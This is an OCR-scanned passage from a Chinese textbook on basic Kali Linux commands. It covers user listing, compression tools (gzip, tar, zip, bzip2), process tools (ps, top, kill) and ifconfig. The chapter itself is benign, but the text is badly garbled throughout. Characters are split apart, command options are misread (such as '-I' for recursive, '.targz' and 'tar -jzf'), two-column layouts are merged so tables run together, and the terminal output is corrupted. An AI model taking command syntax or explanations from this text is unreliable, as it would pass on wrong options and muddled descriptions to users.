昌 4.7.6 WwW 


Kali Linux 系 统 中 的 w 命 令 用 于 显示 目 
前 登录 系统 的 用 户 信息 。 执 行 这 项 指令 可 
得 知 目前 登录 系统 的 用 户 有 哪些 人 ， 以 及 他 
们 正在 执行 的 程序 。 单 独 执行 w 指 令 会 显示 
所 有 的 用 户 ， 也 可 指定 用 户 名 称 ， 仅 显示 某 
位 用 户 的 相关 信息 。 命 令 语法 格式 如 下 : 

Ww [-fhlsuV] [用户 名 称 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 
表 w 命 令 参 数 介 绍 

语文 

开启 或 关闭 显示 用 户 从 何 处 登录 系统 
不 显示 各 栏 位 的 标题 信息 列 
使 用 详细 格式 列表 ， 此 为 预 设 值 
使 用 简洁 格式 列表 ， 不 显示 用 户 登 录 时 
间 ， 终 端 机 阶段 作业 和 程序 所 耗费 的 
CPU 时 间 
忽略 执行 程序 的 名 称 ， 以 及 该 程序 耗费 
CPU 时 间 的 信息 
显示 版 本 信息 


例如 : 使 用 w 命 令 查看 登录 用 户 的 详细 
信息 ， 下 图 为 执行 效果 。 


5 TIERAUIT /TOE tenpy Ww 
92:00:19 up 3:17, 1 user, load 
SER TTY FROM 

1 1 


average; 0.00, 9.00, 0.00 
LOGINR IDLE JCPU PCPU WHAT 
22:44 ?xdn? 7:40 0.12s /usr/lib/qdn3/q 


侈 提示 : Kali Linux 为 用 户 提供 了 两 个 用 于 
查询 用 户 信 息 的 指令 ， 分 别 为 who 命 令 与 w 命 
令 ， 其 中 ，w 命 令 相对 来 说 信息 更 全 面 一 些 。 


4.8 文件 解压 缩 操作 命令 


在 日 常 工 作 中 Kali Linux 系 统 会 产生 大 
量 的 日 志文 件 ， 如 果 不 去 处 理 可 能 会 导致 
硬盘 空间 告急 ， 因 此 合理 地 使 用 解压 缩 命 
令 将 一 类 文件 压缩 存放 ， 既 可 以 减少 空间 
浪费 还 便于 移动 。 
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4.8.1 gzip 


Kali Linux 系 统 中 的 gzip 命 令 用 于 压缩 
文件 ，gzip 是 个 使 用 广泛 的 压缩 程序 ， 文 件 
经 它 压缩 过 后 ， 其 名 称 后 面 会 多 出 “.gz” 
的 扩展 名 。 命 令 语法 格式 如 下 : 

gzip [-acdfhlLnNqrtvV][-S &lt; 压 缩 
字 尾 字符 串 &gt;] [-&1lt; 压 缩 效率 &gt;] [--best/ 
fast] [文件 ...] 或 gzip [-acdfhlLnNqrtvVv] 


[-S &lt; 压 缩 字 尾 字 符 串 &gt;] [-&1t; 压 缩 效 率 
&gt;] [--best/fast] [目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”gzip 命令 参数 介绍 
选 项 含 义 
-a 或 --ascii 使 用 ASCII 文 字模 式 
-Cc 或 --stdout 或 --to- | 把 压缩 后 的 文件 输出 到 标准 输出 
stdout 设备 ， 不 去 更 动 原始 文件 
ee | wat 
强行 压缩 文件 。 不 理会 文件 名 称 
- 域 --force 或 硬 连 接 是 否 存在 以 及 该 文件 是 
否 为 符号 连接 
-或 -help 在 线 帮助 
-] 或 --list 列 出 压缩 文件 的 相关 信息 
- 工 或 --license 显示 版 本 与 版 权 信息 
I 压缩 文件 时 ， 不 保存 原来 的 文件 
名 称 及 时 间 戳 记 
i 压缩 文件 时 ， 保 存 原 来 的 文件 名 
称 及 时 间 蕉 记 
-q 或 --quiet 不 显示 警告 信息 


递归 处 理 ， 将 指定 目录 下 的 所 有 
文件 及 子 目录 一 并 处 理 


-I 或 --recursive 


-S< 压 缩 字 尾 字符 
串 > 或 ----suffix< 压 | 更 改 压缩 字 尾 字符 串 
缩 字 尾 字符 串 > 
-或 --test 测试 压缩 文件 是 否 正 确 无 误 
-Vv 或 --verbose 显示 指令 执行 过 程 
-V 或 --version 显示 版 本 信息 
压缩 效率 是 一 个 介 于 1 一 9 的 数 
-< 压缩 效率 > 值 ， 预 设 值 为 “6”， 指 定 越 大 
的 数值 ， 压 缩 效 率 就 会 越 高 
i es “-9” 参 数 
本 pe “-1” 参 数 
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gzip 命 令 只 能 压缩 文件 ， 例 如 : 使 用 
gzip services 命 令 压缩 001.txt 文 件 ， 下 图 为 
运行 效果 ， 压 缩 后 源 文件 消失 ， 使 用 gzip -d 
可 以 解压 .gz 文件 ， 同 时 gz 压缩 比例 还 是 很 


大 的 。 

root@kali:~/temp# 【TS -TL 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 93:44 services 
root@kali:-/temp# gzip services 

root@kali:-/temp# ls -1L 

总 用 量 8 


上 rw-r--r-- 1 root root 7441 16 月 31 693:44 services.gz 


4.8.2 gunzip 


Kali Linux 系 统 中 的 gunzip 命 令 用 于 解 
压 文 件 。gunzip 是 个 使 用 广泛 的 解压 缩 程 
序 ， 它 用 于 解 开 被 gzip 压 缩 过 的 文件 ， 这 些 
压缩 文件 预 设 最 后 的 扩展 名 为 “.gz”。 事 
实 上 gunzip 就 是 gzip 的 硬 连接 ， 因 此 不 论 是 
压缩 或 解压 缩 ， 都 可 通过 gzip 指 令 单独 完 
成 。 命 令 语法 格式 如 下 : 

gunzip [=acfhlLinNaqartvv] [l=s < 
压缩 字 尾 字符 串 >] [文件 ...] 或 gunzip 
[-acfhlLnNqrtvV] [-s < 压缩 字 尾 字符 串 >] [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 gunzip 命 令 参数 介绍 


选 项 育 文 

-a 或 --ascii 使 用 ASCII 文 字模 式 

-c 或 --stdout 或 --to- | 把 解压 后 的 文件 输出 到 标准 输 

stdout 出 设备 
强行 解 开 压缩 文件 ， 不 理会 文 

- 域 -force 件 名 称 或 硬 连接 是 否 存在 以 及 
该 文件 是 否 为 符号 连接 

-或 --help 在 线 帮 助 

-] 或 --list 列 出 压缩 文件 的 相关 信息 

工 或 --license 显示 版 本 与 版 权 信息 
解压 缩 时 ， 若 压缩 文件 内 含有 

-0 或 -no-name 远 来 的 文件 名 称 及 时 间 戳 记 ， 
则 将 其 忽略 不 予 处 理 
解压 缩 时 ， 若 压缩 文件 内 含有 

-NN 或 --name 原来 的 文件 名 称 及 时 间 和 戳记， 
则 将 其 回 存 到 解 开 的 文件 上 

-q 或 --quiet 不 显示 警告 信息 


续 表 


选 项 含 义 


递归 处 理 ， 将 指定 目录 下 的 所 


-I 或 --recursive 


有 文件 及 子 目 录 一 并 处 理 
-S< 压 缩 字 尾 字符 串 
> 或 --suffix< 压 缩 字 | 更 改 压 缩 字 尾 字符 串 
尾 字符 串 > 
-或 --test 测试 压缩 文件 是 否 正确 无 误 
-V 或 --verbose 显示 指令 执行 过 程 


gunzip 命 令 与 gzip 配 合 使 用 ， 通 过 gzip 


显示 版 本 信息 


-V 或 --version 


压缩 后 的 文件 可 以 通过 gunzip 解 压缩 ， 例 匡 
如 : 使 用 gunzip 001.txt.gz 命 令 ， 下 图 为 运 
行 效果 ， 解 压 后 源 压缩 包 消 失 。 

root@kali: 


总 用 量 8 
-rw-r--r-- 1 root root 7441 16 月 31 63:44 services.g: 


temp# Ls -TU 


root@kali:~/temp# gunzip services.gz 
Iroot@kali:-/temp# ls -\ 
总 用 量 29 


-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 


4.8.3 tar 
Kali Linux 系 统 中 的 tar 命 令 用 于 备份 文思 


件 ，tar 是 用 来 建立 、 还 原 备 份 文件 的 工具 程 

序 ， 它 可 以 加 入 ， 解 开 备份 文件 内 的 文件 ， 

使 用 tar 命 令 压 缩 后 ， 文 件 的 格式 为 .targz。 
命令 语法 格式 如 下 : 


tar 选项 [-zcf] [压缩 后 文件 名 ] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 tar 命令 参数 介绍 
选 项 含 义 

< 打包 
-V 显示 详细 信息 
f 指定 文件 名 
二 打包 同时 压缩 


tar 命 令 可 以 将 目录 打包 成 一 个 文件 ， 
例如 : 使 用 tar -cvf temp.tar temp 命 令 ， 将 
目录 temp 打 包 成 teamp tar 文件 ， 如 果 需 要 在 
打包 的 同时 进行 压缩 可 以 加 入 -z 选 项 ， 下 
图 为 tar -zcf temp.tar temp 命 令 执行 效果 ， 它 
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相当 于 tar -cvf temp.tar temp 和 gzip temp.tar 


两 条 命令 ， 另外 .tar.gz 是 最 常见 的 源 代码 安 


例如 : 使 用 tar -zxvf temp.tar.gz 命 令 ， 
将 打 好 的 .tar.gz 包 进行 解压 ， 如 下 图 所 示 ， 


日 y 
装 包 。 tar 解 压 是 不 删除 源 压缩 文件 的 。 

FooTt@kali: -# Us Fa 

esktop Downloads Pictures temp Test > 区 人 SR Mi ter.ge Videog 
ocuments Music Public 。 Templates Videos ee 

‘oot@kali:-# tar -zcf temp.tar.gz temp 7 

oot@kati:-# 1s kenpyeel.txt 

esktop Downloads Pictures temp temp.tar.gz Videod 

ocuments Music Pubtic Templates Test 


4.8.4 zip 


Kali Linux 系 统 中 的 zip 命 令 用 于 压缩 
文件 ， 文 件 经 它 压 缩 后 会 另外 产生 具有 
“.zip” 扩 展 名 的 压缩 文件 ， 同 时 它 也 是 多 
系统 之 间 兼 容 性 较 好 的 压缩 。 命 令 语 法 格式 


tar 命 令 解 压缩 的 命令 语法 格式 如 下 : 
选项 [-zxvf] [压缩 后 的 文件 名 ] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 

表 tar 命 令 参数 介绍 


tar 


选 项 4 如 下 : 

x 解 包 

二 zip [-AcdDfFghjJKlLmoqrSTuvVwXyz$] 
车 显示 详细 信息 [-b < 工作 目录 >] [-11] [-n < 字 尾 字符 串 >] [-t < 
得 指定 解压 文件 日 期 时 间 >] [-< 压 缩 效 率 >] [压缩 文件 ] [文件 . . .] [-i 

一 < 范本 样式 >] [- < 范本 样式 >] 
-z 解压 缩 | 

命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”zip 命令 参数 介绍 
选 项 含义 
-A 调整 可 执行 的 自动 解压 缩 文 件 
-b< 工 作 目 录 > 指定 暂时 存放 文件 的 目录 
< 普 每 个 被 压缩 的 文件 加 上 注释 
-4 从 压缩 文件 内 删除 指定 的 文件 
-D 压缩 文件 内 不 建立 目录 名 称 
量 此 参数 的 效果 和 指定 “-u” 参 数 类 似 ， 但 不 仅 更 新 已 有 文件 ， 如 果 某 些 文件 原本 不 存在 
于 压缩 文件 内 ， 使 用 本 参数 会 一 并 将 其 加 入 压缩 文件 中 

下 尝试 修复 已 损坏 的 压缩 文件 
-g 将 文件 压缩 后 附加 在 已 有 的 压缩 文件 之 后 ， 而 非 另行 建立 新 的 压缩 文件 
了 在 线 帮助 
-i< 范 本 样式 > 只 压缩 符合 条 件 的 文件 
jj 只 保存 文件 名 称 及 其 内 容 ， 而 不 存放 任何 目录 名 称 
可 删除 压缩 文件 前 面 不 必要 的 数据 
廿 使 用 MS-DOS 兼 容 格式 的 文件 名 称 
4 压缩 文件 时 ， 把 LF 字符 置换 成 LF+CR 字 符 
ll 压缩 文件 时 ， 把 LF+CR 字 符 置换 成 LF 字符 
至 显示 版 权 信息 
-m 将 文件 压缩 并 加 入 压缩 文件 后 ， 删 除 原始 文件 ， 即 把 文件 移 到 压缩 文件 中 
了 < 字 尾 字符 串 > 不 压缩 具有 特定 字 尾 字符 串 的 文件 
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续 表 
选 项 含 义 
二 以 压缩 文件 内 拥有 最 新 更 改 时 间 的 文件 为 准 ， 将 压缩 文件 的 更 改 时间 设 成 和 该 文件 
相同 
-q 不 显示 指令 执行 过 程 
I 递归 处 理 ， 将 指定 目录 下 的 所 有 文件 和 子 目录 一 并 处 理 
-S 包含 系统 和 隐藏 文件 
-t< 日 期 时 间 > 把 压缩 文件 的 日 期 设 成 指定 的 日 期 
十 检查 备份 文件 内 的 每 个 文件 是 否 正确 无 误 
已 更 换 较 新 的 文件 到 压缩 文件 内 
vy 显示 指令 执行 过 程 或 显示 版 本 信息 
二 保存 VMS 操 作 系统 的 文件 属性 
-Ww 在 文件 名 称 里 加 入 版 本 编号 ， 本 参数 仅 在 VMS 操 作 系 统 下 有 效 
-x< 范 本 样式 > 压缩 时 排除 符合 条 件 的 文件 
这 不 保存 额外 的 文件 属性 
-y 直接 保存 符号 连接 ， 而 非 该 连接 所 指向 的 文件 ， 本 参数 仅 在 UNIX 之 类 的 系统 下 有 效 
-$ 保存 第 一 个 被 压缩 文件 所 在 磁盘 的 卷 册 名 称 
过 蔡 压 缩 文件 加 上 注释 
-< 压缩 效率 > 压缩 效率 是 一 个 介 于 1 一 9 的 数值 


例如 : 使 用 zip -r temp.zip temp 命 令 压 
缩 目 录 ， 下 图 为 执行 效果 ， 也 可 以 不 加 -r 压 


缩 文件 。 


和 # ls 


p -Dow 


oo 
adding: temp/ (stored 0%) 
adding: temp/services (deflated 61%) 
Foot@kali:-~# ls 
pesktop 
Pocuments 


Download: 


Musi public 


pictures 


temp 
Template est 


temp.zip Videod 


4.8.5 unzip 
Kali Linux 系 统 品 


Pp 的 unzip 命 令 用 于 解压 


缩 zip 文 件 ，unzip 为 .zip 压 缩 文 件 的 解压 缩 
程序 。 命 令 格式 语法 如 下 : 


unzip [-cflptuvz] [-agCjLMnoqsVX] [-P 
< 密码 >] [ .zip 文件 ] [文件 ] [-d < 目录 >] [-x < 文件 


>] 或 unzip [-2] 


命令 中 选项 的 参 


表 unzip 命令 参数 介绍 


党 发 


数 介绍 见 下 表 。 


将 解压 缩 的 结果 显示 到 屏幕 上 ， 并 对 字符 做 适当 的 转换 


f 更 新 现 有 的 文件 
| 显示 压缩 文件 内 所 包含 的 文件 
了 与 -c 参 数 类 似 ， 会 将 解压 缩 的 结果 显示 到 屏幕 上 ， 但 不 会 执行 任何 的 转换 


检查 压缩 文件 是 否 正确 


与 -参数 类 似 ,但 是 除了 更 新 现 有 的 文件 外 ， 也 会 将 压缩 文件 中 的 其 他 文件 解压 缩 到 目 


录 中 
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续 表 
选 项 全 一 灾 
~ 执行 实时 显示 详细 的 信息 
z 仅 显示 压缩 文件 的 备注 文字 
-a 对 文本 文件 进行 必要 的 字符 转换 
b 不 要 对 文本 文件 进行 字符 转换 
局 压缩 文件 中 的 文件 名 称 区 分 大 小 写 
可 不 处 理 压缩 文件 中 原 有 的 目录 路 径 
本 将 压缩 文件 中 的 全 部 文件 名 改 为 小 写 
-M 将 输出 结果 送 到 more 程 序 处 理 
解压 缩 时 不 要 覆盖 原 有 的 文件 
-0 不 必 先 询问 用 户 ，unzip 执 行 后 覆盖 原 有 文件 
-P< 密 码 > 使 用 zip 的 密码 选项 
-q 执行 时 不 显示 任何 信息 
-Ss 将 文件 名 中 的 空白 字符 转换 为 底线 字符 
-V 保留 VMS 的 文件 版 本 信息 
XX 解压 缩 时 同时 回 存 文件 原来 的 UID/GID 
[zip 文 件 ] 指定 .zip 压 缩 文件 
[文件 ] 指定 要 处 理 .zip 压 缩 文件 中 的 哪些 文件 
-d< 目 录 > 指定 文件 解压 缩 后 所 要 存储 的 目录 
-X< 文 件 > 指定 不 要 处 理 .zip 压 缩 文件 中 的 哪些 文件 
-Z unzip -Z 等 于 执行 zipinfo 指 令 


换 ，n 不 替换 。 


root@kali:~# ls 
Desk 
Public 
zip temp.zip 
:temp.zip 
replace temp/services? [yjes 
inflating: temp/services 
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loads Pictures 


加 unzip 命 令 同样 是 解压 zip 格 式 的 文件 ， 
例如。 使 用 unzip temp.zip 命 令 ， 解 压 zip 文 
” 件 ， 下 图 为 运行 效果 ， 由 于 源 文件 还 存在 

所 以 它 会 提示 是 否 要 替换 源 文件 ， 回 答 y 蔡 


tenp tenp.zip Videos 
Tenplates Test 


[nl]o, [AJW, [Nlone, [rlename: y 


4.8.6 bzip2 


Kali Linux 系 统 中 的 bzip2 命 令 是 .bz2 
文件 的 压缩 程序 ，bzip2 采 用 新 的 压缩 演算 
法 ， 压 缩 效果 比 传统 的 LZ77/LZ78 压 缩 算法 
更 好 。 若 没有 加 上 任何 参数 ，bzip2 压 缩 完 


文件 后 会 产生 .bz2 的 压缩 文件 ， 
的 文件 。 命 令 语 法 格式 如 下 : 
bzip2 


best][I=-=repetitive=-fastl{= 


缩 的 文件 ] 


删除 原始 


[-cdfhkLstvVz] [--repetitive-— 


压缩 等 级 ] [要 压 
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命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”bzip2 命 令 参数 介绍 
选 项 含 义 
-或 --stdout 将 压缩 与 解压 缩 的 结果 送 到 标准 输出 
-d 或 --decompress 执行 解压 缩 
ie bzip2 在 压缩 或 解压 缩 时 ， 若 输出 文件 与 现 有 文件 同名 ， 预 设 不 会 覆盖 现 有 文件 。 若 要 
覆盖 ， 请 使 用 此 选项 
-或 -help 显示 帮助 
上 或 -keep bzip2 在 压缩 或 解压 缩 后， 会 删除 原始 的 文件 。 若 要 保留 原始 文件 ， 请 使 用 此 选项 
-5 或 --small 降低 程序 执行 时 内 存 的 使 用 量 
-或 --test 测试 .bz2 压 缩 文件 的 完整 性 
-Vv 或 --verbose 压缩 或 解压 缩 文件 时 ， 显 示 详 细 的 信息 
-z 或 --compress 强制 执行 压缩 
--repetitive-best 若 文件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 提高 压缩 效果 
--repetitive-fast 若 文件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 加 快 执行 速度 
-压缩 等 级 压缩 时 的 区 块 大 小 
bzip2 是 gzip 的 一 个 升级 版 ， 也 只 能 用 表 bunzip2 命 令 参数 介绍 
于 压缩 文件 ， 并 且 压 缩 比 例 惊 人 。 如 果 压 Ta 一 
Ep ， 例 如 : 
缩 一 个 比较 大 的 文件 推荐 使 用 ， 例 如 ee 
运行 bzip2 -k services 命 令 ， 压 缩 services 二 与 现 有 文件 同名 时 ， 预 设 
文件 ， 下 图 为 命令 执行 效果 ， 如 果 有 压缩 不 会 覆盖 现 有 的 文件 。 若 
目录 的 需求 ， 可 以 先 使 用 tar 命 令 将 目录 党 汪汪 请 使 用 放 
打包 成 文件 ， 再 用 bzip2 进 行 压 缩 ， 也 可 在 解压 缩 后 ， 预 设 会 删除 
以 使 用 tar --cjf 一 次 性 打包 再 压缩 成 .tarbz2 -或 - 原来 的 压缩 文件 。 若 要 保 
人 - 计生 ep 留 压缩 文件 ， 请 使 用 此 参 
格式 。 
Foot@kali: /tenp# Us -T 8 
时 1 root root 19183 16 月 31 93:44 services -s 或 --small 降低 程序 执行 时 ， 内 存 的 
|rootekati:-/temp# bzip2 -k services 使 用 量 
Iroot@kali:~/temp# ls -1 Ss 
Te 1 root root 19183 16 月 31 63:44 services -或 -verbose 解压 缩 文件 时 ， 显 示 详细 
-rw-r--r-- 1 root root 7198 16 月 31 63:44 services.bz2 的 信息 
-L--license.-V 或 --version | 显示 版 本 信息 


4.8.7 bunzip2 一 一 

Kali Linux 系 统 中 的 bunzip2 命 令 是 .bz2 例如 : 使 用 bunzip2 eb2 丛 令 相 
文件 的 解压 缩 程序 。bunzip2 可 解压 缩 bz2 ， 压 文件 ， 下 图 为 命令 执行 效果 ， 如 果 想 要 
格式 的 压缩 文件 。bunzip2 实 际 上 是 bzip2 的 ”解压 -tar.bz2 的 文件 同样 可 以 使 用 tar -jzf 来 


符号 连接 ， 执 行 bunzip2 与 bzip2 -d 的 效果 相 ”完成 。 


一 AAA Foot@Kkali:~/temp# Ls -LU 
同 。 命 令 语法 格式 如 下 : 总 用 到 8 
-rw-r--r-- 1 root root 7198 16 月 31 93:44 services.bz. 
bunzip2 [-fkLsvV][.bz2 压 缩 文件 ] footexald: /temps Use es 
、 总 用 量 29 
命令 中 选项 的 参数 介绍 见 下 表 。 -rr re 1 root root 19183 16 月 31 03:44 services 
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在 对 文件 进行 压缩 解压 的 过 程 中 ， 应 
该 注意 以 下 几 点 : 

(1) .gz 格式 使 用 gzip 进行 压缩 ， 使 
gunzip 或 者 gzip -d 进行 解压 ， 只 可 压 
缩 文件 。 

(2) .tar 格式 使 用 tar -cf 进行 打包 ， 使 
-xf 进行 解 包 。 

(3) .targz 格 式 使 用 tar -zcf 打 包 并 压 
缩 ， 使 用 -zxf 解压 缩 。 

(4) .zip 格式 使 用 zip 压缩 -r 压缩 目录 ， 
unzip 解压 缩 。 


mn 


续 表 


(5) .bz2 格式 使 用 bzip2 进行 压缩 < 
保留 源 文件 ，bunzip2 解压 缩 。 

(6) .tarbz2 格式 使 用 tar -cjf 进行 打包 
并 压缩 ， 使 用 -xjf 解压 。 


4.9 网 络 系统 操作 命令 


任何 操作 系统 如 果 不 能 上 网 那么 使 用 
的 意义 将 会 大 打折 扣 ， 接 入 网 络 是 当前 操 
作 系统 的 一 个 必要 任务 ， 因 此 掌握 基础 的 
网 络 操作 是 很 有 必要 的 。 


盟 4.9.1 ps 


Kali Linux 系 统 中 的 ps 命令 用 于 显示 当前 进 


” 程 process) 的 状态 。 命 令 语法 格式 如 下 : 


ps [options] [--help] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 PS 命令 参数 介绍 
选 项 含 义 
-A 列 出 所 有 的 行程 
-Ww 显示 加 宽 可 以 显示 较 多 的 资讯 
-au 显示 较 详 细 的 资讯 


-aux 显示 所 有 包含 其 他 使 用 者 的 行程 
输出 格式 :USER PID %CPU %MEM 


au(x) VSZ RSS TTY STAT START TIME 
COMMAND 

USER 行程 拥有 者 

PID pid 
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选 项 含 义 
%CPU 占用 的 CPU 使 用 率 
%MEM 占用 的 记忆 体 使 用 率 
VSZ 占用 的 虚拟 记忆 体 大 小 
RSS 占用 的 记忆 体 大 小 
过 人 (minor device 
STAT 该 行程 的 状态 
D 不 可 中 断 的 静止 
R 正在 执行 中 
S 静止 状态 
第 暂停 执行 
区 不 存在 但 暂时 无 法 消除 
Ww 没有 足够 的 记忆 体 分 页 可 分 配 
- 高 优先 序 的 行程 
N 低 优 先 序 的 行程 
有 记忆 体 分 页 分 配 并 锁 在 记忆 体内 
(实时 系统 或 TAIO) 
START 行程 开始 时 间 
TIME 执行 的 时 间 
COMMAND ”| 所 执行 的 指令 


例如 : 使 用 ps 查看 系统 进行 信息 ， 下 
图 为 执行 效果 ， 由 于 信息 量 比较 大 ， 这 里 
只 寄 去 了 部 分 信息 。 


FE RS 
ISER PID scPU Mem YSZ 
aa we cy we dr 
Ni me 


可 
| 
2 


日 
9 


2 
3 


cpuhpy8] 
Lepuhp/1] 


Kali Linux 系 统 中 时 刻 运 行 着 许多 进 
程 ， 如 果 能 够 合理 地 管理 它们 ， 则 可 以 优 
化 系统 的 性 能 。 在 Kali Linux 系 统 中 ， 有 5 种 
常见 的 进程 状态 ， 分 别 为 运行 、 中 断 、 不 
可 中 断 、 僵 死 与 停止 ， 其 各 自 含义 如 下 。 

e R (运行): 进程 正在 运行 或 在 运 
行 队列 中 等 待 。 


root 14 
oot 15 
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S〈 中 断 ) : 进程 处 于 休眠 中 ， 当 某 
个 条 件 形成 后 或 者 接收 到 信号 时 ， 
则 脱离 该 状态 。 

e D (不 可 中 断 ) : 进程 不 响应 系统 
异步 信号 ， 即 便 用 kill 命 令 也 不 能 将 
其 中 断 。 

e Z ( 僵 死 ) : 进程 已 经 终止 ， 但 进 
程 描述 依然 存在 ， 直 到 父 进程 调用 
wait40 系 统 函数 后 将 进程 释放 。 

e T〈 停 止 ) : 进程 收 到 停止 信号 后 停 

止 运行 。 


4.9.2 top 


Kali Linux 系 统 中 的 top 命 令 用 于 实时 
显示 进程 的 动态 ， 其 使 用 权限 为 所 有 使 用 
者 。 命 令 语法 格式 如 下 : 


行 中 的 程序 或 工作 。 命 令 语 法 格式 如 下 : 
kill [选项 ] [进程 PID] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 kil 命令 参数 介绍 


若 不 加 信号 的 编号 选项 ， 则 使 用 
“-1” 选 项 会 列 出 全 部 的 信号 名 称 


当 处 理 当 前 进程 时 ， 不 限制 命令 名 


-1 < 信息 编号 > 


top [-] [d delay] [q] [c] [s] [s] es 和 进程 号 的 对 应 关系 
ede 指定 kill 命 令 只 打印 相关 进程 的 进程 
El 1 AN 
命令 中 选项 的 参数 介绍 见 下 表 。 J 号 ， 而 不 发 送 任何 信号 
表 top 命 令 参数 介绍 a 指定 发 送信 号 

选 项 含 义 
改变 显示 的 更 新 速度 ， 或 是 在 交谈 式 指 Es 

a 令 列 (interactive command) 按 s sy En 
没有 任何 延迟 的 显示 速度 ， 如 果 使 用 者 es 行 效果 。 

-4 是 有 管理 员 的 权限 ， 则 top 将 会 以 最 高 的 ss 中 So 二 Sr 全 
优先 序 执行 Bl Som Dae em 1 
要 旺 示 楼 式 ， 共 有 丙种 模式， 一 种 是。 2 区 和 

光 只 显示 执行 档 的 名 称 ， 另 一 种 是 显示 完 。 2 Sera 3 oie 33) Sosehy 2) Sm 3 5 
整 的 路 径 与 名 称 局 全 5) Sem 53) 有 于 3) so 

累积 模式 ， 会 将 己 完成 或 消失 的 子 行程 
(dead child process) 的 CPU time 累 积 起 来 4.9.4 ifconfig 
安全 模式 ， 将 交谈 式 指令 取消 . 避免 潜在 

-Ss 的 危机 Kali Linux 系 统 中 的 ifconfig 命 令 用 于 品 

不 显示 任何 闲置 (idle) 或 无 用 Czoubit) ”获取 网 卡 配置 与 网 络 状态 等 信息 ， 使 用 让 

2 的 行程 config 命 令 来 查看 本 机 当前 的 网 卡 配置 与 

1 更 新 的 次 数 ， 完 成 后 将 会 退出 top 网 络 状态 等 信息 时 ， 其 实 主要 查看 的 就 是 

网 批 次 档 模式 ， 配 合 n 选 项 一 起 使 用 , 可 以 ”网 卡 名 称 、inet 参 数 后 面 的 IP 地 址 、ether 
用 来 将 top 的 结果 输出 到 档案 内 参数 后 面 的 网 卡 物理 地 址 (又 称 为 MAC 

S 地 址 ) ， 以 及 RX、TX 的 接收 数据 包 与 发 
例如 : 使 用 top 命 令 查看 系统 进程 信息 ， 


下 图 为 执行 效果 ， 这 里 只 截取 了 部 分 信息 。 


送 数 据 包 的 个 数 及 累计 流量 。 
ifconfig 命 令 语 法 格式 如 下 : 


天 


ifconfig 
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命令 中 选项 的 参数 介绍 见 下 表 。 


表 ifconfig 命令 参数 介绍 


选项 含义 
add< 地 址 > 设置 网 络 设备 [Pv6 的 人 P 地 址 
del< 地 址 > 删除 网 络 设备 IPv6 的 他 地 址 
down 关闭 指定 的 网 络 设备 


<hw< 网 络 设备 类 型 >< 硬 件 地 址 > 设置 网 络 设备 的 类 型 与 硬件 地 址 


io_addr<IO 地 址 > 


设置 网 络 设备 的 IO 地 址 


irq<IRQ 地 址 > 
media< 网 络 媒介 类 型 > 
mem_start< 内 存 地 址 > 
metric< 数 目 > 

mtu< 字 节 > 
netmask< 子 网 掩 码 > 
tunnel< 地 址 > 

wp 

-broadcast< 地 址 > 
-pointopoint< 地 址 > 
-promisc 

[PP 地 址 ] 

[网 络 设备 ] 


设置 网 络 设备 的 IRQ 

设置 网 络 设备 的 媒介 类 型 

设置 网 络 设备 在 主 内存 所 占用 的 起 始 地 址 

指定 在 计算 数据 包 的 转送 次 数 时 ， 所 要 加 上 的 数目 
设置 网 络 设备 的 MTU 

设置 网 络 设备 的 子 网 掩 码 

建立 IPv4 与 IPv6 之 间 的 隧道 通信 地 址 
启动 指定 的 网 络 设备 

将 要 送 往 指 定 地 址 的 数据 包 当 成 广播 数据 包 来 处 理 
与 指定 地 址 的 网 络 设备 建立 直接 连 线 ， 此 模式 具有 保密 功能 
关闭 或 启动 指定 网 络 设备 的 promiscuous 模 式 

指定 网 络 设备 的 耻 地 址 

指定 网 络 设备 的 名 称 


例如 : 使 用 ifeonfig 查 看 网 卡 信息 ， 下 图 为 运行 效果 。 


型 


FGatERaUIS- ITConTI9 
Ptho: flags=4163<UP,BROADCAST ,RUNNING, MULTICAST> ntu 1569 


inet 192.168.157.132 netmask 255.255.255.0 broadcast 192.168.157.255 
inet6 fe80;;20c;29ff:fe39:f29c prefixlen 64 scopeid 0x26<Link> 
ether 00:0c:29:39:f2:9¢ txqueuelen 1999 [Ethernet) 

RX packets 7258 bytes 5674882 (5.4 MiB) 

RX errors @ dropped 8 overruns 6 frame 9 

TX packets 1969 bytes 135449 (132.2 KiB) 

TX errors @ dropped 6 overruns 6 carrier 9 collisions @ 


lo: flags=73<UP, LOOPBACK,RUNNING> mtu 65536 


inet 127.6.9.1 netnask 255.9.0.6 
inet6 ::1 prefixlen 128 scopeid @xl9<host> 

loop txqueuelen 1999 (Local Loopback) 

RX packets 36 bytes 1992 (1.9 KiB) 

RX errors 6 dropped 6 overruns 6 frane 9 

TX packets 36 bytes 1992 (1.9 kiB) 

TX errors @ dropped 6 overruns 6 carrier 8 collisions © 


Mlang: flags=4163<UP,BROADCAST,RUNNING,NULTICAST> ntu 1599 


inet 192.168.0.114 netmask 255.255.255.9 broadcast 192.168.9.255 
inet5 fe80::814f:d52c:e332:2ebl prefixlen 64 scopeid 6x29<tink> 
ether e8:4e:96:28:ae:46 txqueueten 1999 [Ethernet) 

RX packets 2325 bytes 137499 (134.1 KiB) 

RX errors 8 dropped 8 overruns 6 frane 9 

TX packets 194 bytes 8349 (8.1 KiB) 

TX errors 6 dropped 6 overruns 6 carrier 9 collisions © 
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他 提示 : 

@ eth0 代 表 以 太 网 卡 如 果 有 多 块 网 
卡 ， 会 一 次 为 eth0，eth1，eth2 这 样 
排列 。 

@ lo 代表 本 地 回环 网 卡 ， 每 个 系统 都 
有 一 个 唯一 的 本 地 回环 。 

e@ wlan0 代 表 无 线 网 卡 ， 如 果 有 多 块 
无 线 网 卡 同 以 太 网 卡 一 样 依次 排列 
为 wlan0，wlan1 这 样 。 


4.10 Kali Linux 系 统 的 文本 编 
辑 器 


在 Kali Linux 系 统 中 ， 目 前 使 用 比较 
多 的 是 vim 编 辑 器 ，vim 具 有 程序 编辑 的 能 
力 ， 可 以 主动 地 以 字体 颜色 辨别 语法 的 正 
确 性 ， 方 便 程序 设计 。 


